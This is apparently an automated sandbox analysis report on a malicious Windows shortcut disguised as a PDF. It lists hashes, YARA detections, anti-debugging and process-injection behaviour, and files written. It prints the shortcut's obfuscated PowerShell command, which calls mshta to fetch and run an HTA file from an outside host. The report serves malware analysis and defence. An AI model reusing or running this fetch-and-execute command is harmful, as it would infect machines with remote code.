Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 21, 2024, 9:46 a.m.	June 21, 2024, 9:49 a.m.

Size	1.9KB
Type	MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=13, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`e1e2e0cf2113a375950c57f87e265345`
SHA256	`45059a69513b7540ea52fdcef6a744daed15dc907948eea6b92d5480b5d7c754`
CRC32	`314A556E`
ssdeep	`24:8s/BHYVKVW8p+/CWRC7hmydd79dsoEZ/oda:845a8B7hmydJ9ha`
Yara	Antivirus - Contains references to security software Lnk_Format_Zero - LNK Format lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "hABkAAIszrgAUSI" C:\Users\test22\AppData\Local\Temp\79973772993.pdf.lnk
3040
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'https://www.royriox.us/563427.hta'
  2188

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 21, 2024, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2024, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2024, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2024, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2024, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2024, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 21, 2024, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2024, 9:46 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 21, 2024, 9:46 a.m.			0	0

Command line console output was observed (8 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 21, 2024, 9:46 a.m.	buffer: The term '\W\S2\mh?a.' is not recognized as the name of a cmdlet, function, console_handle: 0x00000023	1	1
WriteConsoleW June 21, 2024, 9:46 a.m.	buffer: script file, or operable program. Check the spelling of the name, or if a path console_handle: 0x0000002f	1	1
WriteConsoleW June 21, 2024, 9:46 a.m.	buffer: was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW June 21, 2024, 9:46 a.m.	buffer: At line:1 char:2 console_handle: 0x00000047	1	1
WriteConsoleW June 21, 2024, 9:46 a.m.	buffer: + . <<<< $env:C:\W\S2\mh?a. 'https://www.royriox.us/563427.hta' console_handle: 0x00000053	1	1
WriteConsoleW June 21, 2024, 9:46 a.m.	buffer: + CategoryInfo : ObjectNotFound: (\W\S2\mh?a.:String) [], Com console_handle: 0x0000005f	1	1
WriteConsoleW June 21, 2024, 9:46 a.m.	buffer: mandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW June 21, 2024, 9:46 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f63c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f5bc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f5bc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f5bc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f6148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2024, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 21, 2024, 9:46 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 138 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 917504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0209a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73922000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02092000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0209b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a55000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a57000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a59000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a5a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a5b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a5c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a5d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a5e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a5f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2024, 9:46 a.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\79973772993.pdf.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'https://www.royriox.us/563427.hta'

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 21, 2024, 9:46 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3040 resumed a thread in remote process 2188
NtResumeThread June 21, 2024, 9:46 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2188	1	0	0

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

